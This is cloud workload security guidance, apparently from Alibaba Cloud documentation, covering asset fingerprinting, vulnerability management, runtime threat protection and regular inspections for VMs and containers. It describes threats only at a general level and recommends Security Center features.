Workloads in the cloud are a set of related functions or atomic capabilities that support IT business systems, such as servers, VMs, containers, networks, databases, etc. VMs and containers are the most commonly used workload environments in the cloud.
For VMs and containers protection, the following points should be considered
Effectively identify workloads and understand the asset fingerprints in the cloud.
Identify and remediate vulnerabilities in workloads.
Establish runtime protection mechanisms to ensure the security of your workloads.
Develop a regular security inspection plan to ensure the security, effectiveness, and compliance of your workloads.
Identify and Review Asset Basic Security Information
Before implementing security protection measures, it is necessary to understand the assets that enterprises own in the cloud, as well as the basic information and security information of assets. Identifying and reviewing asset fingerprints can help enterprises quickly obtain up-to-date details of assets and workloads in the cloud.
Usually, the asset fingerprints that enterprises should pay attention to include the following:
No. | Asset Fingerprint | Purpose | Security-related Actions |
No. | Asset Fingerprint | Purpose | Security-related Actions |
1 | Server Basic Information | Used to collect basic attributes of servers, such as regions, access methods, security protection status, etc. | The presence of a public IP on a server can indicate a higher risk. By checking the server's basic information, you can determine whether the server is protected by a security tool. For example, check if the server is installed with the Alibaba Cloud Security Center agent to determine if it has the ability to defend against attacks.
|
2 | Accounts | Used to collect privileged and regular user accounts in servers. | Analyze and compare account information to identify and locate attacks during incident tracing. |
3 | Ports | Used to collect the exposed ports and network protocols on servers, as well as the processes associated with each port. | Used for analyzing and converging exposed ports, and analyzing the network protocols associated with the ports for centralized management and monitoring. |
4 | Processes | Used to collect the processes running on servers. | Analyze the process path, start time, and startup parameters to determine the potential malicious processes implanted as backdoors. |
5 | Middleware | Used to collect the application middleware deployed on servers. | After a high-risk middleware vulnerability is released or a vulnerability alert is published, you can quickly determine the impact and the priority of vulnerability by counting the number and distribution of middleware currently deployed. |
6 | Scheduled Tasks | Used to collect the commands and accounts of scheduled tasks. | In some attack incidents, attackers create scheduled tasks to maintain the persistence of their tools. |
7 | Startup Items | Used to collect the paths and servers associated with startup items. | Analyzing startup items can be useful in tracing and locating attack incidents. |
Enterprises need to have methods and tools to automate the collection, storage, statistics, and analysis of basic asset information. This will help determine the severity of incidents, analyze attack processes, and identify the appropriate response measures.
Best Practices
Identifying and analyze asset basic information and security information involves the following steps:
Choose a method and frequency for collecting asset fingerprints. It is generally recommended to use automated collection methods to collect basic information and fingerprints of servers, and it is recommended to use agent-based collection instead of network scanning.
Classify the collected asset fingerprints and store them in categories according to the seven modules mentioned in the table above.
When a security incident occurs, check the update status of asset fingerprints and analyze whether there are any suspicious user accounts, processes, scheduled tasks, or exposed ports before and after the security incident.
Alibaba Cloud provides security tools that help enterprises quickly identify and analyze the basic information and security information of their assets in the cloud. You can use Alibaba Cloud Security Center to automate the collection of asset fingerprints and visualize the results. The logs can be stored in SLS, which can be configured with relevant monitoring and alerts or used for incident context.
Vulnerability Management
Vulnerabilities are one of the most exploited weaknesses in network attacks. Vulnerability management includes identifying vulnerabilities, assessing their severity, prioritizing patches, fixing vulnerabilities, and continuous scanning. Implementing vulnerability management in the cloud can effectively reduce the vulnerability of servers, reduce the risk of server exposure, and improve overall security.
Enterprises need to develop a comprehensive vulnerability management plan, including the vulnerability scanning plan, vulnerability assessment criteria, vulnerability remediation process, vulnerability management responsibilities, and vulnerability emergency response plans.
The following are some recommendations for vulnerability management:
Vulnerability Management Item | Recommendations |
Vulnerability Management Item | Recommendations |
Vulnerability Scanning Plan | Define the scope of cloud vulnerability scanning, which usually includes operating system vulnerabilities, application vulnerabilities, container image vulnerabilities, and code vulnerabilities. Regularly scan for operating system vulnerabilities and application vulnerabilities based on business importance and internal requirements. Perform vulnerability scanning for container images before deployment. Fix high-risk images before deployment and release. Use static code analysis to check common issues in application source code. Consider regularly hiring external experts and technicians to conduct external penetration tests on core systems.
|
Vulnerability Assessment Criteria | Evaluate the impact of the vulnerability in the current system environment based on dimensions such as the vulnerability disclosure time, exploitability, and importance of assets. Alibaba Cloud provides a vulnerability scoring system that can evaluate the risk of vulnerabilities in real environments, serving as a reference for enterprise vulnerability assessments. Refer to Alibaba Cloud Vulnerability Scoring System.
|
Vulnerability Remediation Process | Vulnerability remediation needs to consider the impact on business and the maintenance windows of workloads. |
Vulnerability Management Responsibilities | In general, the security team is responsible for monitoring and assessing vulnerability risks, impacts, and severity, and notifying the business team to fix vulnerabilities. |
Vulnerability Emergency Response Plan | For high-risk vulnerabilities or 0-day vulnerabilities, there should be a vulnerability emergency response plan. Quick response is needed before vulnerability fix recommendations and guidance are released. |
Enterprises should fully understand the shared responsibility model for cloud security. In this model, Alibaba Cloud is responsible for protecting the security of the cloud platform and maintaining the vulnerabilities in the cloud platform. Enterprises are responsible for the vulnerabilities in their self-built workloads.
Best Practices
For both ECS and container deployment scenarios, attention should be paid to the security of images, especially in large-scale deployment scenarios where there may be a large number of member accounts within the enterprise. In such scenarios, there are the following pain points: each business creates and builds images under their own member accounts without unified security baselines, which may lead to business risks. It is also difficult to distribute images uniformly in multi-region and multi-account environments. Alibaba Cloud recommends that enterprises use the Golden Image solution to build images within a specific shared-services account, to achieve centralized control. This helps avoid the use of non-compliant images by workload accounts. Based on resource directory and automation capabilities, images can be distributed quickly to all workload accounts at once. In terms of image security, Alibaba Cloud suggests that enterprises use Security Center to perform regular security scans on images and centrally manage workload runtime environment.
Security Center provides vulnerability management capabilities for workloads.
Use Alibaba Cloud Security Center to automatically identify servers and assets in the cloud. To achieve this, configure a vulnerability scanning task for automated identification and detection of vulnerabilities.
Check the risk level indications provided by Security Center for vulnerabilities. Security Center provides comprehensive vulnerability scores and priorities based on vulnerability risk level, exploitability, and disclosure time.
For operating system vulnerabilities, use Security Center to perform one-click fixes, and view fix precautions before applying patches. You can also create snapshots of operating systems as backups for rollback purposes.
For application vulnerabilities, use Security Center to view fix recommendations, vulnerability details, and affected scope. Security Center does not provide one-click fixes for application vulnerabilities.
For container image vulnerabilities, use Security Center to check vulnerabilities and weaknesses in container images.
For emergency vulnerabilities, use Security Center to conduct a quick self-check. Emergency vulnerabilities are high-risk and 0-day vulnerability provided by Alibaba Cloud Security Team. Security Center can detect if servers are affected by the emergency vulnerabilities. In addition, it can be linked with the firewall's virtual patch protection feature for quick defense, thereby providing proactive prevention and emergency response capabilities.
Use Security Center to design vulnerability remediation plans and automate vulnerability remediation for specific types, levels, and groups of servers. For more information, refer to the Security Center playbook feature.
Runtime Protection
Runtime protection for workloads provides runtime protection for servers, container environments, etc., by deploying security agents inside the servers or container environments. It provides threat detection, threat analysis, and threat response capabilities.
Enterprises should pay attention to threats that workloads face at runtime, and use relevant security protection measures to protect their workloads.
No. | Runtime Threats | Harm |
1 | Virus and Trojan Horses | Trojans are programs specifically designed to infiltrate user servers. They often download and release other malicious programs after being disguised as system programs. |
2 | Ransomware | Ransomware is a type of malware that encrypts and locks all critical data files on a server to demand a ransom. |
3 | Malicious Tampering | Upstream processes attempt to move system files to evade monitoring by security software. This may indicate attackers trying to bypass monitoring mechanisms during the intrusion process. |
4 | Backdoor | Suspicious WebShell files, which attackers implant as backdoors after successfully infiltrating websites to maintain their privileges. |
5 | Abnormal Login | Two user logins occurring on a server within a short period of time from geographically distant locations, with one location being your frequently used one. This indicates that the login request moved from a common location to an abnormal location. |
6 | Brute-force Attacks | A single IP attempting to log in with multiple invalid usernames on a server and eventually succeeds. |
7 | Communication Activities with Mining Pools | Traffic indicating communication with mining pool IP addresses, indicating that your server may have been compromised and is being used for mining activities. |
8 | Lateral Movement within the Internal Network | Abnormal internal network connections, which may indicate attackers moving laterally within servers after infiltrating them. |
9 | Execution of Malicious Code Scripts | Execution of malicious Bash, PowerShell, Python, and other script codes on the server. |
10 | Worm Virus | Worm viruses are programs used to launch attacks on other servers from compromised servers, often including vulnerability exploitation and password cracking. |
11 | Suspicious Privileged Containers | Suspicious privileged containers that start up, which can compromise the security of the container runtime environment. Once breached, it can affect other containers and assets on the host server. |
Best Practices
Alibaba Cloud Security Center is a native workload protection component on the cloud. Refer to Security Center. For ECS instances created in the cloud, Alibaba Cloud Security Center Agent is installed by default. Security Center provides runtime protection for workloads.
Enable runtime protection: Enable runtime protection in Security Center. It is necessary to enable security hardening during ECS creation, which ensures that the Security Center agent will be deployed automatically. For protection requirements, enable the corresponding functions in Security Center.
Enable virus detection: Configure virus detection scan policies, choose to scan specific business systems-related servers or all servers, and set the scan plan. Refer to virus detection.
Enable anti-ransomware protection: Configure anti-ransomware protection, which can protect your servers against ransomware attacks. Security Center provides anti-ransomware protection, offers decoy folders, and sets up important data backups. Refer to Anti-ransomware protection.
Enable host protection: Configure host protection rules for identifying and blocking abnormal behaviors on hosts, e.g., rules for preventing brute-force attacks and rules for custom process alerts. Refer to host-specific rule management.
Enable container protection: Configure container proactive defense rules, such as prohibiting the startup of images that have not passed security detection, and configuring container file defenses, etc. Refer to Use the feature of proactive defense for containers.
View events and alerts: Use Security Center to view runtime alerts. Alibaba Cloud Security Center classifies alerts according to ATT&CK attack phases, which provides a more intuitive display of attack paths, attack processes, and attack details. Refer to Events.
Regular Security Inspection
Security is a dynamic and continuous process. Enterprises should conduct regular security inspections of their workloads and develop inspection and monitoring strategies.
Inspection plan: Create an inspection plan based on the importance of business systems and the risk exposure level, customize inspection cycles, and assign responsibilities.
Inspection contents: Develop inspection contents, such as regularly checking the online status of runtime protection agents. Inspection contents should include workload security status, vulnerability status, vulnerability remediation status, and security incident handling status.
Automation: Use automation methods to conduct regular security inspections of workloads, and set relevant security monitoring metrics so that your security experts can obtain valuable information from a large number of security alerts.
Elastic Compute Service (ECS)
Container Compute Service (ACS)
